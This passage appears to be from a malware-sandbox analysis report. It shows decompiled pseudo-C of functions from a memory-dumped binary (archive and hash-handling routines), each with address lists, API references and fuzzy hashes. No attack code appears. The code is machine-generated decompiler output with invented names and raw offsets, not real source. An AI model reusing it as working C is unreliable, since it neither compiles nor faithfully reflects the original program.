				 *((char*)(_t96 - 0xd)) = 1;
				_t88 =  *((intOrPtr*)( *((intOrPtr*)(_t93 + 0x128)) + 0x10));
				if( *((intOrPtr*)(_t93 + 0x3b)) == 0 || _t88 !=  *((intOrPtr*)(_t93 + 0x124))) {
					_push(_t93 + 0x80);
					_push("Unknown reparse stream");
					L6:
					_t62 = L003C3A05(_t93);
					_t82 =  *((intOrPtr*)(_t93 + 0x11c));
					 *((intOrPtr*)(_t96 - 0x14)) = _t62;
					if( *((intOrPtr*)(_t93 + 0x11c)) != 0) {
						_t65 = E003BFDDF(_t82,  *((intOrPtr*)(_t93 + 0x120)), _t88);
						if( *((intOrPtr*)(_t96 - 0x14)) == 0) {
							 *((intOrPtr*)(_t96 - 0x14)) = _t65;
						}
					}
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t93 + 0x37)));
					_push(_t88);
					_push( *((intOrPtr*)(_t93 + 0x120)));
					_t67 = L003C5A6D(_t96 - 0x28);
					 *((char*)(_t96 - 0xe)) = _t67;
					if(_t67 != 0) {
						L9:
						_t63 =  *((intOrPtr*)(_t93 + 0x12c));
						if(_t63 != 0) {
							 *((intOrPtr*)( *_t63 + 8))(_t63);
							 *((intOrPtr*)(_t93 + 0x12c)) = 0;
						}
						goto L11;
					} else {
						_push(_t93 + 0x80);
						_push("Incorrect reparse stream");
						goto L6;
					}
				}
			}


















                                                                                                    0x003c5bc6
                                                                                                    0x003c5bd0
                                                                                                    0x003c5bd8
                                                                                                    0x003c5bdb
                                                                                                    0x003c5bdd
                                                                                                    0x003c5be0
                                                                                                    0x003c5be3
                                                                                                    0x003c5bee
                                                                                                    0x003c5bf1
                                                                                                    0x003c5c84
                                                                                                    0x003c5c86
                                                                                                    0x003c5c8e
                                                                                                    0x003c5c91
                                                                                                    0x003c5c9a
                                                                                                    0x003c5c9a
                                                                                                    0x003c5d22
                                                                                                    0x003c5d25
                                                                                                    0x003c5d2b
                                                                                                    0x003c5d2d
                                                                                                    0x003c5d33
                                                                                                    0x003c5d3b
                                                                                                    0x003c5d3b
                                                                                                    0x003c5c95
                                                                                                    0x003c5c98
                                                                                                    0x003c5ca2
                                                                                                    0x003c5ca5
                                                                                                    0x003c5d1f
                                                                                                    0x003c5d1f
                                                                                                    0x00000000
                                                                                                    0x003c5d1f
                                                                                                    0x003c5ca7
                                                                                                    0x003c5caa
                                                                                                    0x003c5cb0
                                                                                                    0x003c5cb6
                                                                                                    0x003c5cba
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003c5cc2
                                                                                                    0x003c5cc8
                                                                                                    0x003c5ccd
                                                                                                    0x003c5ccf
                                                                                                    0x003c5ce6
                                                                                                    0x003c5ceb
                                                                                                    0x003c5cef
                                                                                                    0x003c5cf0
                                                                                                    0x003c5cf1
                                                                                                    0x003c5cf4
                                                                                                    0x003c5cf9
                                                                                                    0x003c5cfb
                                                                                                    0x003c5cfd
                                                                                                    0x003c5d0c
                                                                                                    0x003c5d0f
                                                                                                    0x003c5d1c
                                                                                                    0x003c5d11
                                                                                                    0x003c5d11
                                                                                                    0x003c5d17
                                                                                                    0x003c5d17
                                                                                                    0x00000000
                                                                                                    0x003c5d0f
                                                                                                    0x003c5d02
                                                                                                    0x003c5d08
                                                                                                    0x00000000
                                                                                                    0x003c5d08
                                                                                                    0x003c5cd1
                                                                                                    0x003c5cd2
                                                                                                    0x003c5cd9
                                                                                                    0x003c5cde
                                                                                                    0x003c5ce0
                                                                                                    0x00000000
                                                                                                    0x003c5ce2
                                                                                                    0x003c5ce2
                                                                                                    0x00000000
                                                                                                    0x003c5ce2
                                                                                                    0x003c5ce0
                                                                                                    0x00000000
                                                                                                    0x003c5c98
                                                                                                    0x003c5c00
                                                                                                    0x003c5c04
                                                                                                    0x003c5c07
                                                                                                    0x003c5c40
                                                                                                    0x003c5c41
                                                                                                    0x003c5c46
                                                                                                    0x003c5c48
                                                                                                    0x003c5c4d
                                                                                                    0x003c5c53
                                                                                                    0x003c5c58
                                                                                                    0x003c5c61
                                                                                                    0x003c5c69
                                                                                                    0x003c5c6b
                                                                                                    0x003c5c6b
                                                                                                    0x003c5c69
                                                                                                    0x00000000
                                                                                                    0x003c5c11
                                                                                                    0x003c5c1a
                                                                                                    0x003c5c1b
                                                                                                    0x003c5c1c
                                                                                                    0x003c5c20
                                                                                                    0x003c5c27
                                                                                                    0x003c5c2a
                                                                                                    0x003c5c6e
                                                                                                    0x003c5c6e
                                                                                                    0x003c5c76
                                                                                                    0x003c5c7b
                                                                                                    0x003c5c7e
                                                                                                    0x003c5c7e
                                                                                                    0x00000000
                                                                                                    0x003c5c2c
                                                                                                    0x003c5c32
                                                                                                    0x003c5c33
                                                                                                    0x00000000
                                                                                                    0x003c5c33
                                                                                                    0x003c5c2a

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003C5BC6
                                                                                                      • Part of subcall function 003C5A6D: __EH_prolog.LIBCMT ref: 003C5A72
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID: Incorrect reparse stream$Unknown reparse stream$can't delete file
                                                                                                    • API String ID: 3519838083-394804653
                                                                                                    • Opcode ID: 4e46106ac0df431c44b67218941c2ca693c168fac7b8ef8d9344d942b70736c3
                                                                                                    • Instruction ID: 88401c31797ce821357b65477cfa01a65cd8275a24fe5706571cee3cf0f51a16
                                                                                                    • Opcode Fuzzy Hash: 4e46106ac0df431c44b67218941c2ca693c168fac7b8ef8d9344d942b70736c3
                                                                                                    • Instruction Fuzzy Hash: 0541A372901B859FCF22DFA48484FEEBBB5AF55300F59846EE186E7601C6307E84C765
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003E72A7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 94%
                                                                                                    			E003E72A7(void* __ebx, struct _IO_FILE** __ecx, void* __edx, void* __eflags) {
				void* __edi;
				void* _t25;
				void* _t26;
				void* _t34;
				struct _IO_FILE** _t59;
				void* _t65;

				E0041F1B0(E004261D4, _t65);
				_t59 = __ecx;
				E003B2D47(_t65 - 0x24);
				 *(_t65 - 4) =  *(_t65 - 4) & 0x00000000;
				_t25 = E003DD72D(__ebx, _t65 - 0x24,  *((intOrPtr*)(_t65 + 0xc)), __edx, 9);
				if( *((intOrPtr*)(_t65 - 0x20)) != 0) {
					E003B2690(_t65 - 0x18);
					 *(_t65 - 4) = 1;
					E003B2D47(_t65 - 0x30);
					 *(_t65 - 4) = 2;
					E003E630C(__edx,  *((intOrPtr*)(_t65 + 8)), _t59, _t65, _t65 - 0x18, _t65 - 0x30);
					_t72 =  *((intOrPtr*)(_t65 - 0x14));
					if( *((intOrPtr*)(_t65 - 0x14)) == 0) {
						_push( *((intOrPtr*)(_t65 - 0x30)));
						L003B1FB3(_t59, __eflags);
					} else {
						fputs( *(_t65 - 0x18),  *_t59); // executed
					}
					fputs(" = ",  *_t59); // executed
					_t34 = E003E71BF(_t59,  *((intOrPtr*)(_t65 - 0x24)), _t59, _t72); // executed
					_t25 = E003B1E40(E003B1E40(_t34,  *((intOrPtr*)(_t65 - 0x30))),  *(_t65 - 0x18));
				}
				_t26 = E003B1E40(_t25,  *((intOrPtr*)(_t65 - 0x24)));
				 *[fs:0x0] =  *((intOrPtr*)(_t65 - 0xc));
				return _t26;
			}









                                                                                                    0x003e72ac
                                                                                                    0x003e72b6
                                                                                                    0x003e72bd
                                                                                                    0x003e72c5
                                                                                                    0x003e72cf
                                                                                                    0x003e72d8
                                                                                                    0x003e72dd
                                                                                                    0x003e72e5
                                                                                                    0x003e72e9
                                                                                                    0x003e72fb
                                                                                                    0x003e72ff
                                                                                                    0x003e7304
                                                                                                    0x003e730e
                                                                                                    0x003e731b
                                                                                                    0x003e7320
                                                                                                    0x003e7310
                                                                                                    0x003e7315
                                                                                                    0x003e7318
                                                                                                    0x003e732c
                                                                                                    0x003e7335
                                                                                                    0x003e7345
                                                                                                    0x003e734b
                                                                                                    0x003e734f
                                                                                                    0x003e735a
                                                                                                    0x003e7362

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: fputs$H_prolog
                                                                                                    • String ID: =
                                                                                                    • API String ID: 2614055831-2525689732
                                                                                                    • Opcode ID: 0019daca804e15e4d7e7b4653e420ffcd875ecba37d8c0fd397b6fdb508ac10a
                                                                                                    • Instruction ID: 4d07f5636919c33845abb85423d28ac611e550020c46091e18bcbcc893230633
                                                                                                    • Opcode Fuzzy Hash: 0019daca804e15e4d7e7b4653e420ffcd875ecba37d8c0fd397b6fdb508ac10a
                                                                                                    • Instruction Fuzzy Hash: 3521C032904158EFCF0AEB94E842BEEBBB5EF48304F20012AE501761E1DB756E44DBA4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003D5C4B Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 87%
                                                                                                    			E003D5C4B(void* __ecx, void* __eflags) {
				void* __ebx;
				void* _t32;
				void* _t33;
				void* _t34;
				void* _t35;
				signed int _t36;
				void* _t43;
				void* _t65;
				void* _t68;
				void* _t73;

				_t73 = __eflags;
				E0041F1B0(E00424EE4, _t68);
				_t65 = __ecx;
				L003D5D1D(_t68 - 0x64);
				 *(_t68 - 4) = 0;
				E003B302D(_t68 - 0x54, "Hash");
				 *((intOrPtr*)(_t68 - 0x5c)) = 0x3d5d59;
				 *((intOrPtr*)(_t68 - 0x3c)) = 0x3d5d8b;
				 *((intOrPtr*)(_t68 - 0x58)) = 0;
				 *((intOrPtr*)(_t68 - 0x64)) = 0x3041;
				_t32 = E003B2D47(_t68 - 0x24);
				 *(_t68 - 4) = 1;
				_t33 = E003B2DCD(_t68 - 0x18, "sha256 sha512 sha224 sha384 sha1 sha md5 crc32 crc64 asc cksum");
				_push(_t32);
				_push(_t33);
				 *(_t68 - 4) = 2;
				_t34 = E003D66A9(_t68 - 0x64, _t73); // executed
				_t35 = E003B1E40(_t34,  *((intOrPtr*)(_t68 - 0x18)));
				 *(_t68 - 4) = 0;
				_t36 = E003B1E40(_t35,  *((intOrPtr*)(_t68 - 0x24)));
				 *((intOrPtr*)(_t68 - 0x34)) = 0;
				 *((char*)(_t68 - 0x38)) = _t36 & 0xffffff00 |  *((intOrPtr*)(_t68 - 0x3c)) != 0x00000000;
				 *((char*)(_t68 - 0x37)) = 1;
				E003B421F(L003BFF16(_t68 - 0x30,  *((intOrPtr*)(_t68 - 0x3c))), 0);
				E003EF23F(_t65 + 8);
				_push(_t68 - 0x64);
				E003D6154(_t65 + 8);
				 *(_t68 - 4) =  *(_t68 - 4) | 0xffffffff;
				_t43 = L003D5DC6(0, _t68 - 0x64);
				 *[fs:0x0] =  *((intOrPtr*)(_t68 - 0xc));
				return _t43;
			}













                                                                                                    0x003d5c4b
                                                                                                    0x003d5c50
                                                                                                    0x003d5c5a
                                                                                                    0x003d5c60
                                                                                                    0x003d5c6f
                                                                                                    0x003d5c72
                                                                                                    0x003d5c7a
                                                                                                    0x003d5c81
                                                                                                    0x003d5c88
                                                                                                    0x003d5c8b
                                                                                                    0x003d5c92
                                                                                                    0x003d5ca1
                                                                                                    0x003d5ca5
                                                                                                    0x003d5caa
                                                                                                    0x003d5cab
                                                                                                    0x003d5caf
                                                                                                    0x003d5cb3
                                                                                                    0x003d5cbb
                                                                                                    0x003d5cc3
                                                                                                    0x003d5cc6
                                                                                                    0x003d5cd0
                                                                                                    0x003d5cd9
                                                                                                    0x003d5cdc
                                                                                                    0x003d5ce8
                                                                                                    0x003d5cf2
                                                                                                    0x003d5cfc
                                                                                                    0x003d5cfd
                                                                                                    0x003d5d02
                                                                                                    0x003d5d09
                                                                                                    0x003d5d14
                                                                                                    0x003d5d1c

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003D5C50
                                                                                                      • Part of subcall function 003D66A9: __EH_prolog.LIBCMT ref: 003D66AE
                                                                                                      • Part of subcall function 003D66A9: wcscmp.MSVCRT ref: 003D673B
                                                                                                      • Part of subcall function 003B1E40: free.MSVCRT(?,003D6B41,00000000,00000000,00000001,?,003B10EB), ref: 003B1E44
                                                                                                      • Part of subcall function 003EF23F: _CxxThrowException.MSVCRT(?,0042FFC8), ref: 003EF265
                                                                                                      • Part of subcall function 003D6154: __EH_prolog.LIBCMT ref: 003D6159
                                                                                                      • Part of subcall function 003D5DC6: __EH_prolog.LIBCMT ref: 003D5DCB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog$ExceptionThrowfreewcscmp
                                                                                                    • String ID: A0$Hash$sha256 sha512 sha224 sha384 sha1 sha md5 crc32 crc64 asc cksum
                                                                                                    • API String ID: 4250029832-3656212537
                                                                                                    • Opcode ID: 2c68c9b11ad217e9e4ae5f7ed3e490699d89dd722a79a0586cd2a1f2434acc36
                                                                                                    • Instruction ID: d779595e61947846b084da28233482c014359d33b4796cb341d40f0aeb749696
                                                                                                    • Opcode Fuzzy Hash: 2c68c9b11ad217e9e4ae5f7ed3e490699d89dd722a79a0586cd2a1f2434acc36
                                                                                                    • Instruction Fuzzy Hash: 4D21CF75D01348EECB06EBE0E9969EDBBB5EF11304F20002EE4152B282DB741F08CB60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003F7E33 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 86%
                                                                                                    			E003F7E33(void* __ebx, signed int __ecx) {
				void* _t24;
				intOrPtr* _t29;
				void* _t32;
				void* _t34;
				signed int _t42;
				void* _t46;

				_t34 = __ebx;
				E0041F1B0(E00427651, _t46);
				_push(__ecx);
				_t42 = __ecx;
				 *(_t46 - 0x10) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x42eb78;
				 *((intOrPtr*)(__ecx + 4)) = 0x42eb5c;
				 *((intOrPtr*)(__ecx + 8)) = 0x42eb4c;
				 *((intOrPtr*)(__ecx + 0xc)) = 0x42eb38;
				_push(__ecx);
				 *(_t46 - 4) = 1;
				_t24 = E003F8FE4(__ecx); // executed
				E003B1E40(E003B1E40(E003B1E40(_t24,  *((intOrPtr*)(__ecx + 0x21c))),  *((intOrPtr*)(_t42 + 0x210))),  *((intOrPtr*)(_t42 + 0x204)));
				L003F7F19(_t42 + 0xb0);
				_t29 =  *((intOrPtr*)(_t42 + 0xa8));
				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
				if(_t29 != 0) {
					 *((intOrPtr*)( *_t29 + 8))(_t29);
				}
				asm("sbb esi, esi");
				_t44 =  ~_t42 & _t42 + 0x00000018;
				 *(_t46 - 0x10) =  ~_t42 & _t42 + 0x00000018;
				 *(_t46 - 4) = 2;
				L003C9708(( ~_t42 & _t42 + 0x00000018) + 0x40);
				 *(_t46 - 4) =  *(_t46 - 4) | 0xffffffff;
				_t32 = E003D6019(_t34, _t44 + 0x34);
				 *[fs:0x0] =  *((intOrPtr*)(_t46 - 0xc));
				return _t32;
			}









                                                                                                    0x003f7e33
                                                                                                    0x003f7e38
                                                                                                    0x003f7e3d
                                                                                                    0x003f7e3f
                                                                                                    0x003f7e41
                                                                                                    0x003f7e44
                                                                                                    0x003f7e4a
                                                                                                    0x003f7e51
                                                                                                    0x003f7e58
                                                                                                    0x003f7e5f
                                                                                                    0x003f7e60
                                                                                                    0x003f7e67
                                                                                                    0x003f7e88
                                                                                                    0x003f7e96
                                                                                                    0x003f7e9b
                                                                                                    0x003f7ea1
                                                                                                    0x003f7ea7
                                                                                                    0x003f7eac
                                                                                                    0x003f7eac
                                                                                                    0x003f7eb4
                                                                                                    0x003f7eb6
                                                                                                    0x003f7eb8
                                                                                                    0x003f7ebe
                                                                                                    0x003f7ec5
                                                                                                    0x003f7eca
                                                                                                    0x003f7ed1
                                                                                                    0x003f7eda
                                                                                                    0x003f7ee2

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003F7E38
                                                                                                      • Part of subcall function 003F8FE4: __EH_prolog.LIBCMT ref: 003F8FE9
                                                                                                      • Part of subcall function 003B1E40: free.MSVCRT(?,003D6B41,00000000,00000000,00000001,?,003B10EB), ref: 003B1E44
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog$free
                                                                                                    • String ID: 8B$LB$\B
                                                                                                    • API String ID: 2654054672-2301794094
                                                                                                    • Opcode ID: 63462add75f92f9992c517a39f6bd9f209ce2383fd81499ff9f317bd8b983007
                                                                                                    • Instruction ID: 62e9354bea0d335b82d697d0d224ea20b6c224264236dc73c0a34fd749a2c2de
                                                                                                    • Opcode Fuzzy Hash: 63462add75f92f9992c517a39f6bd9f209ce2383fd81499ff9f317bd8b983007
                                                                                                    • Instruction Fuzzy Hash: CB11A071500724DBC721EF61D806BDABBF4AF10308F40855EE4A697591DBB4B904DB84
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003E7141 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 92%
                                                                                                    			E003E7141(struct _IO_FILE** __ecx, char* __edx) {
				void* __edi;
				void* _t20;
				struct _IO_FILE** _t35;
				void* _t37;

				E0041F1B0(E0042619C, _t37);
				_t35 = __ecx;
				fputs(__edx,  *__ecx); // executed
				fputs(" = ",  *_t35); // executed
				_t43 =  *((char*)(_t37 + 0xc));
				if( *((char*)(_t37 + 0xc)) == 0) {
					E003B2D8A(_t37 - 0x18,  *((intOrPtr*)(_t37 + 8)));
					_t5 = _t37 - 4;
					 *_t5 =  *(_t37 - 4) & 0x00000000;
					__eflags =  *_t5;
					E003B209A(_t35, _t37 - 0x18);
					_push( *((intOrPtr*)(_t37 - 0x18)));
					L003B1FB3(_t35, __eflags); // executed
					_t20 = E003B1E40(E003B1FA0(_t35),  *((intOrPtr*)(_t37 - 0x18)));
				} else {
					_t20 = E003E71BF(_t35,  *((intOrPtr*)(_t37 + 8)), fputs, _t43);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t37 - 0xc));
				return _t20;
			}







                                                                                                    0x003e7146
                                                                                                    0x003e714f
                                                                                                    0x003e715b
                                                                                                    0x003e7164
                                                                                                    0x003e7169
                                                                                                    0x003e716d
                                                                                                    0x003e7181
                                                                                                    0x003e7186
                                                                                                    0x003e7186
                                                                                                    0x003e7186
                                                                                                    0x003e7190
                                                                                                    0x003e7197
                                                                                                    0x003e719a
                                                                                                    0x003e71a9
                                                                                                    0x003e716f
                                                                                                    0x003e7174
                                                                                                    0x003e7174
                                                                                                    0x003e71b4
                                                                                                    0x003e71bc

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003E7146
                                                                                                    • fputs.MSVCRT ref: 003E715B
                                                                                                    • fputs.MSVCRT ref: 003E7164
                                                                                                      • Part of subcall function 003E71BF: __EH_prolog.LIBCMT ref: 003E71C4
                                                                                                      • Part of subcall function 003E71BF: fputs.MSVCRT ref: 003E7201
                                                                                                      • Part of subcall function 003E71BF: fputs.MSVCRT ref: 003E7237
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: fputs$H_prolog
                                                                                                    • String ID: =
                                                                                                    • API String ID: 2614055831-2525689732
                                                                                                    • Opcode ID: a87cf492c9d897f55d8ae6393bfc79f7ccc44c79ddf489360a699466f769073c
                                                                                                    • Instruction ID: f7e2399c9fd3c71121184afe1ec353b2cc1e208d900ac48a8058e1954565f8c9
                                                                                                    • Opcode Fuzzy Hash: a87cf492c9d897f55d8ae6393bfc79f7ccc44c79ddf489360a699466f769073c
                                                                                                    • Instruction Fuzzy Hash: 33012631A00054EBCF17BB65D812BEE7B75EF80304F00822AF5015A6A1CB345956DFD4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003FEEB2 Relevance: 6.1, APIs: 4, Instructions: 71COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 58%
                                                                                                    			E003FEEB2(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void** _a4) {
				intOrPtr _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebp;
				intOrPtr _t24;
				signed int _t34;
				intOrPtr* _t36;
				intOrPtr _t38;
				void* _t43;
				intOrPtr _t46;
				signed int _t47;
				intOrPtr* _t49;
				void* _t51;

				_t43 = __edx;
				_t36 = __ecx;
				_t34 = _a4[1];
				_t49 = __ecx;
				if(_t34 == 0) {
					L8:
					return _t49;
				} else {
					_t46 =  *((intOrPtr*)(__ecx + 4));
					if(_t46 >= 0x7fffffff) {
						L9:
						_push(0x42ffc8);
						_push( &_a4);
						_a4 = 0x7e5;
						L0041F1D0();
						E0041F1B0(0x427ab6, _t51);
						_push(_t36);
						_push(0x228);
						_t38 = E003B1E0C();
						_v20 = _t38;
						_t24 = 0;
						_v8 = 0;
						if(_t38 != 0) {
							_t24 = E003F7C24(_t38, _t43); // executed
						}
						 *[fs:0x0] = _v16;
						return _t24;
					} else {
						_t36 = 0x7fffffff - _t46;
						if(_t34 > 0x7fffffff) {
							goto L9;
						} else {
							_t47 = _t46 + _t34;
							if(_t47 >  *((intOrPtr*)(__ecx + 8))) {
								if(_t47 > 0x7fffffff) {
									_push(0x42ffc8);
									_push( &_a4);
									_a4 = 0x7e5;
									L0041F1D0();
								}
								L003E1D64(_t49, _t47);
							}
							memcpy( *_t49 +  *(_t49 + 4) * 8,  *_a4, _t34 << 3);
							 *(_t49 + 4) = _t47;
							goto L8;
						}
					}
				}
			}
















                                                                                                    0x003feeb2
                                                                                                    0x003feeb2
                                                                                                    0x003feebb
                                                                                                    0x003feebe
                                                                                                    0x003feec2
                                                                                                    0x003fef1f
                                                                                                    0x003fef25
                                                                                                    0x003feec4
                                                                                                    0x003feec4
                                                                                                    0x003feece
                                                                                                    0x003fef28
                                                                                                    0x003fef2b
                                                                                                    0x003fef30
                                                                                                    0x003fef31
                                                                                                    0x003fef38
                                                                                                    0x003fef42
                                                                                                    0x003fef47
                                                                                                    0x003fef48
                                                                                                    0x003fef53
                                                                                                    0x003fef55
                                                                                                    0x003fef58
                                                                                                    0x003fef5c
                                                                                                    0x003fef5f
                                                                                                    0x003fef61
                                                                                                    0x003fef61
                                                                                                    0x003fef69
                                                                                                    0x003fef71
                                                                                                    0x003feed0
                                                                                                    0x003feed2
                                                                                                    0x003feed6
                                                                                                    0x00000000
                                                                                                    0x003feed8
                                                                                                    0x003feed8
                                                                                                    0x003feedd
                                                                                                    0x003feee1
                                                                                                    0x003feee6
                                                                                                    0x003feeeb
                                                                                                    0x003feeec
                                                                                                    0x003feef3
                                                                                                    0x003feef3
                                                                                                    0x003feefb
                                                                                                    0x003feefb
                                                                                                    0x003fef14
                                                                                                    0x003fef1c
                                                                                                    0x00000000
                                                                                                    0x003fef1c
                                                                                                    0x003feed6
                                                                                                    0x003feece

                                                                                                    APIs
                                                                                                    • _CxxThrowException.MSVCRT(?,0042FFC8), ref: 003FEEF3
                                                                                                    • memcpy.MSVCRT ref: 003FEF14
                                                                                                    • _CxxThrowException.MSVCRT(?,0042FFC8), ref: 003FEF38
                                                                                                    • __EH_prolog.LIBCMT ref: 003FEF42
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionThrow$H_prologmemcpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 3273695820-0
                                                                                                    • Opcode ID: 117e40ff4f587b9d06b6f80a17db4b839d76b473d40424e634c1511f546eb14b
                                                                                                    • Instruction ID: c482f7f476bc5fb5393370f4f2a880341f1acb808d6e76ea3199ecc9474407ec
                                                                                                    • Opcode Fuzzy Hash: 117e40ff4f587b9d06b6f80a17db4b839d76b473d40424e634c1511f546eb14b
                                                                                                    • Instruction Fuzzy Hash: 5111E47270025CABCB10EF69D8819AEB7E8AF48754B02443FF619C7290DB74E944C764
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00417E20 Relevance: 6.0, APIs: 4, Instructions: 38synchronizationCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E00417E20(void** __ecx) {
				long _t2;
				void* _t3;
				long _t4;
				int _t6;
				signed int _t7;
				signed int _t8;
				void** _t11;

				_t11 = __ecx;
				_t2 = WaitForSingleObject( *__ecx, 0xffffffff);
				if(_t2 != 0xffffffff) {
					L3:
					_t8 = _t2;
					L4:
					_t3 =  *_t11;
					if(_t3 == 0) {
						L9:
						_t4 = 0;
						L10:
						if(_t8 == 0) {
							return _t4;
						}
						return _t8;
					}
					_t6 = FindCloseChangeNotification(_t3); // executed
					if(_t6 != 0) {
						 *_t11 = 0;
						goto L9;
					}
					_t4 = GetLastError();
					if(_t4 == 0) {
						_t4 = 1;
					}
					goto L10;
				}
				_t2 = GetLastError();
				if(_t2 != 0) {
					goto L3;
				}
				_t8 = _t7 | 0xffffffff;
				goto L4;
			}










                                                                                                    0x00417e23
